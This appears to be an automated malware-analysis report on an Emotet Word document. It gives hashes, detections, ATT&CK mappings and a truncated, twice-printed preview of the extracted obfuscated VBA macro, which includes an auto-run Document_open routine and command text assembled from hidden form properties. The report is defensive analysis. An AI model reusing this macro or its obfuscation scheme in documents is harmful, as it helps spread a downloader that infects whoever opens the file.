Emotet Office (OLE) malware analysis — malicious · 2a8e50ac88870778

MALICIOUS

Office (OLE)

74.4 KB Created: 2019-12-13 11:26:00 Authoring application: Microsoft Office Word First seen: 2020-02-04

MD5: 3477b9ac40c02f31d56789131334dcb5 SHA-1: ba703f7d938c34d016f691dac8fe00deee80b7e2 SHA-256: 2a8e50ac88870778355774050afd4c54a145bd36d3a1671d45faa5ce97e4a562

262 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The file is identified as malicious by ClamAV as Doc.Downloader.Emotet-7451722-0. High-severity heuristics indicate the presence of VBA macros, specifically a Document_Open macro utilizing CreateObject and a hidden UserForm for command staging. This suggests the macro is designed to download and execute a second-stage payload, a common Emotet tactic.

Heuristics 7

ClamAV: Doc.Downloader.Emotet-7451722-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-7451722-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER

VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9574 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	9574 bytes
SHA-256: `dfe5696cd0e58c0334bb6aa1963253cefcfbbfa11e6995277b0b49169ef11ac2`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Bprzcubosb" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Control = "Avqrznti, 0, 0, MSForms, TextBox" Private Sub Document_open() Select _ Case Imvnqslipf Case 233 Tpxfxnjhjdztq _ = Cos _ (949) Krhebouas = Atn(128) Hlotvdqw _ = Cos(613) Case 696 Djiedzaen = Atn(931) Mnbqhbfkzpflx _ = 964 Tqiwcugxgizzx = CDate _ (195) Case 691 Vfsduymdoblm = _ CInt(524) Yylyggkwrzcg = Log(Iichwgtzttlz) Turhhgikna = Izotanisu End Select Select _ Case Zbqvevzw Case 12 Xdirsdewbcnhh _ = Cos _ (915) Gurngwbkm = Atn(577) Moxitbsiijpb _ = Cos(607) Case 371 Evhsostupx = Atn(411) Ipzvtvrbqq _ = 587 Jloynwrsveca = CDate _ (819) Case 40 Yhxszahktcjm = _ CInt(664) Kurnwojceugs = Log(Nenzbbxjd) Ylyslpbfyibn = Fivddmgt End Select Select _ Case Ctkmsmhnineo Case 909 Xfjkalysbbao _ = Cos _ (480) Yjvbshlcvfil = Atn(687) Mhngdkuo _ = Cos(133) Case 444 Estjsile = Atn(495) Ozsdvriukeb _ = 843 Vguouktzkjr = CDate _ (377) Case 930 Nbkmueck = _ CInt(545) Ojkmbzdvcpe = Log(Xuqtpoep) Vdhkxkxmd = Fekyrzgopgvp End Select Ifqzldfozcucj End Sub Attribute VB_Name = "Gqbnhzja" Attribute VB_Base = "0{13A9E500-D973-4AAA-8FE4-84C885845AB8}{4A740EF4-CFE2-484B-B465-240E7FED0D0A}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Bvtsdxmou" Function Jqucngqdeddco() Select _ Case Kvkalxoze Case 24 Sazrbahwtll _ = Cos _ (84) Bqzcfkfmnvt = Atn(229) Tgtlqgllmvxi _ = Cos(433) Case 398 Hajsykvyv = Atn(995) Tuobfeftjg _ = 282 Ivezepub = CDate _ (572) Case 933 Gxlecvnwul = _ CInt(268) Xmxjgqsokxhxb = Log(Lqjavsioqpbc) Nmphiyrbv = Jeziqocf End Select Lsmlpdhdvfdj = Bprzcubosb.Avqrznti Select _ Case Hdbnjuwdsmmm Case 347 Rpdqmeccajh _ = Cos _ (742) Cmsstunlmhbj = Atn(990) Hytwnnxxwh _ = Cos(417) Case 202 Nrecrgvct = Atn(707) Tsscgfhc _ = 829 Tvehntbufp = CDate _ (930) Case 939 Phwgjqvoar = _ CInt(267) Zdvkrrpfzvuva = Log(Mthobpgdk) Wrhsibgfhjxqc = Fntnbgolivtdn End Select Yilwpffq = Lsmlpdhdvfdj + Gqbnhzja.Vifeshixjhic + Gqbnhzja.Hxhvfmsr + Gqbnhzja.Ftezbityhqemf Select _ Case Lejgwhzomb Case 793 Butluomjjqh _ = Cos _ (607) Gzyqamqcgier = Atn(348) Vdcvfhobecu _ = Cos(987) Case 625 Hpbuxemqibymo = Atn(731) Vmouxarggvb _ = 231 Euwwxnjmf = CDate _ (669) Case 722 Mkyncejqq = _ CInt(884) Snzfypjuz = Log(Hmnebobhb) Hinbeeblkgexc = Rptdknlecmzxd End Select Ynrkhpoq = Yilwpffq + Gqbnhzja.Znsbwwmldcicx + Gqbnhzja.Aehcchsevrp.ControlTipText Select _ Case Bsrpkccvcjxbr Case 552 Yxjpevwol _ = Cos _ (92) Oqvdacvjaai = Atn(806) Dvtjmdizgy _ = Cos(690) Case 169 Gmxbfegrtomay = Atn(228) Ghlhqnamjcmc _ ... (truncated)

SHA-256: dfe5696cd0e58c0334bb6aa1963253cefcfbbfa11e6995277b0b49169ef11ac2

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Bprzcubosb"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Avqrznti, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   Select _
 Case Imvnqslipf
      Case 233
         Tpxfxnjhjdztq _
         = Cos _
         (949)
         Krhebouas = Atn(128)
         Hlotvdqw _
         = Cos(613)
      Case 696
         Djiedzaen = Atn(931)
         Mnbqhbfkzpflx _
         = 964
         Tqiwcugxgizzx = CDate _
         (195)
      Case 691
         Vfsduymdoblm = _
         CInt(524)
         Yylyggkwrzcg = Log(Iichwgtzttlz)
         Turhhgikna = Izotanisu
End Select
   Select _
 Case Zbqvevzw
      Case 12
         Xdirsdewbcnhh _
         = Cos _
         (915)
         Gurngwbkm = Atn(577)
         Moxitbsiijpb _
         = Cos(607)
      Case 371
         Evhsostupx = Atn(411)
         Ipzvtvrbqq _
         = 587
         Jloynwrsveca = CDate _
         (819)
      Case 40
         Yhxszahktcjm = _
         CInt(664)
         Kurnwojceugs = Log(Nenzbbxjd)
         Ylyslpbfyibn = Fivddmgt
End Select
   Select _
 Case Ctkmsmhnineo
      Case 909
         Xfjkalysbbao _
         = Cos _
         (480)
         Yjvbshlcvfil = Atn(687)
         Mhngdkuo _
         = Cos(133)
      Case 444
         Estjsile = Atn(495)
         Ozsdvriukeb _
         = 843
         Vguouktzkjr = CDate _
         (377)
      Case 930
         Nbkmueck = _
         CInt(545)
         Ojkmbzdvcpe = Log(Xuqtpoep)
         Vdhkxkxmd = Fekyrzgopgvp
End Select
Ifqzldfozcucj
End Sub


Attribute VB_Name = "Gqbnhzja"
Attribute VB_Base = "0{13A9E500-D973-4AAA-8FE4-84C885845AB8}{4A740EF4-CFE2-484B-B465-240E7FED0D0A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Bvtsdxmou"
Function Jqucngqdeddco()
   Select _
 Case Kvkalxoze
      Case 24
         Sazrbahwtll _
         = Cos _
         (84)
         Bqzcfkfmnvt = Atn(229)
         Tgtlqgllmvxi _
         = Cos(433)
      Case 398
         Hajsykvyv = Atn(995)
         Tuobfeftjg _
         = 282
         Ivezepub = CDate _
         (572)
      Case 933
         Gxlecvnwul = _
         CInt(268)
         Xmxjgqsokxhxb = Log(Lqjavsioqpbc)
         Nmphiyrbv = Jeziqocf
End Select
Lsmlpdhdvfdj = Bprzcubosb.Avqrznti
   Select _
 Case Hdbnjuwdsmmm
      Case 347
         Rpdqmeccajh _
         = Cos _
         (742)
         Cmsstunlmhbj = Atn(990)
         Hytwnnxxwh _
         = Cos(417)
      Case 202
         Nrecrgvct = Atn(707)
         Tsscgfhc _
         = 829
         Tvehntbufp = CDate _
         (930)
      Case 939
         Phwgjqvoar = _
         CInt(267)
         Zdvkrrpfzvuva = Log(Mthobpgdk)
         Wrhsibgfhjxqc = Fntnbgolivtdn
End Select
Yilwpffq = Lsmlpdhdvfdj + Gqbnhzja.Vifeshixjhic + Gqbnhzja.Hxhvfmsr + Gqbnhzja.Ftezbityhqemf
   Select _
 Case Lejgwhzomb
      Case 793
         Butluomjjqh _
         = Cos _
         (607)
         Gzyqamqcgier = Atn(348)
         Vdcvfhobecu _
         = Cos(987)
      Case 625
         Hpbuxemqibymo = Atn(731)
         Vmouxarggvb _
         = 231
         Euwwxnjmf = CDate _
         (669)
      Case 722
         Mkyncejqq = _
         CInt(884)
         Snzfypjuz = Log(Hmnebobhb)
         Hinbeeblkgexc = Rptdknlecmzxd
End Select
Ynrkhpoq = Yilwpffq + Gqbnhzja.Znsbwwmldcicx + Gqbnhzja.Aehcchsevrp.ControlTipText
   Select _
 Case Bsrpkccvcjxbr
      Case 552
         Yxjpevwol _
         = Cos _
         (92)
         Oqvdacvjaai = Atn(806)
         Dvtjmdizgy _
         = Cos(690)
      Case 169
         Gmxbfegrtomay = Atn(228)
         Ghlhqnamjcmc _
        
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.